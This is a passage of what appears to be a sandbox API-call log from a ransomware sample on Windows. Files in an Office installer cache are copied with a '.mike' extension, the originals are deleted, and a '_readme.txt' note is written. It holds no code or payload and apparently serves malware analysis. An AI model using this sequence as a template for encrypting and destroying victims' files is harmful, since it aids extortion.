ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x26b0)) returned 1 [0041.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.298] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.298] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.298] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21428dc | out: lpFileInformation=0x21428dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cdb4e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cdb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x26b0)) returned 1 [0041.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.298] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.298] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0041.299] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.299] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0041.300] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.300] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.300] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.300] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.300] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.301] GetFileType (hFile=0x264) returned 0x1 [0041.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.301] GetFileType (hFile=0x264) returned 0x1 [0041.301] WriteFile (in: hFile=0x264, lpBuffer=0x21445c0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21445c0*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.302] CloseHandle (hObject=0x264) returned 1 [0041.302] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST", lpFilePart=0x0) returned 0x4a [0041.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.302] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0041.302] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0041.303] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2cdb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2cdb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2a53d80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2a53d80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2bf6ca0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x91ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml.mike", cAlternateFileName="BRANDI~1.MIK")) returned 1 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85ab8b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x80760, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwdcw20.dll", cAlternateFileName="")) returned 1 [0041.303] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabf60500, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xabf60500, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85f73a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7eda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwtrig20.exe", cAlternateFileName="")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c8f220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2c8f220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2c8f220, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VC90.CRT.manifest.mike", cAlternateFileName="MICROS~1.MIK")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cb5380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cb5380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2cb5380, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x17e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUI.xml.mike", cAlternateFileName="OFFICE~1.MIK")) returned 1 [0041.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cb5380, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cb5380, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2cdb4e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeMUISet.xml.mike", cAlternateFileName="OFFICE~2.MIK")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2cdb4e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2cdb4e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x26b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x131a1c00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x131a1c00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShellUI.MST", cAlternateFileName="")) returned 1 [0041.305] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c1ce00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2c1ce00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0041.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c1ce00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2c1ce00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2d277a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0041.306] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0041.306] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0041.306] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.306] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.306] CoTaskMemFree (pv=0x4fe370) [0041.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0041.306] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0041.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0041.306] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0041.306] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpFilePart=0x0) returned 0x44 [0041.307] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0041.343] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.343] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0041.344] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpFilePart=0x0) returned 0x50 [0041.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0041.344] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0041.344] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\", lpFilePart=0x0) returned 0x44 [0041.344] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0041.344] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, 